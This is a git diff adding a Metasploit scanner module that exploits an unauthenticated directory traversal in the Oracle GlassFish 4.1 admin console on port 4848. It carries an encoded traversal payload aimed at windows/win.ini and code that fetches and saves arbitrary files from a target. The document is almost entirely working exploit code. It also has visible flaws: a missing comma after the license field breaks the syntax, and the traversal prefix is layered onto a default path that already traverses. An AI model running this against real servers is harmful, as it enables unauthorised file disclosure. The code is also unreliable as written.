diff --git a/modules/auxiliary/scanner/http/glassfish_traversal.rb b/modules/auxiliary/scanner/http/glassfish_traversal.rb new file mode 100644 index 0000000000..e545f79f19 --- /dev/null +++ b/modules/auxiliary/scanner/http/glassfish_traversal.rb @@ -0,0 +1,66 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', + 'Description' => %q{ + This module exploits an unauthenticated directory traversal vulnerability + which exits in administration console of Oracle GlassFish Server 4.1, which is + listening by default on port 4848/TCP. + }, + 'References' => + [ + ['EDB', '39441'] + ], + 'Author' => + [ + 'Trustwave SpiderLabs', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'License' => MSF_LICENSE + 'DisclosureDate' => "Aug 08 2015" + )) + + register_options( + [ + Opt::RPORT(4848), + OptString.new('FILEPATH', [true, "The path to the file to read", '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini']), + OptInt.new('DEPTH', [ true, 'Path Traversal Depth', 10 ]) + ]) + + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "..%5d" * datastore['DEPTH'] << filename + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/theme/META-INF/prototype#{traversal}" + }) + + if res && res.code == 200 + print_good("#{res.body}") + + path = store_loot( + 'oracle.glassfish', + 'text/plain', + ip, + res, + filename + ) + + print_good("File saved at: #{path}") + else + print_error("Nothing was downloaded") + end + end +end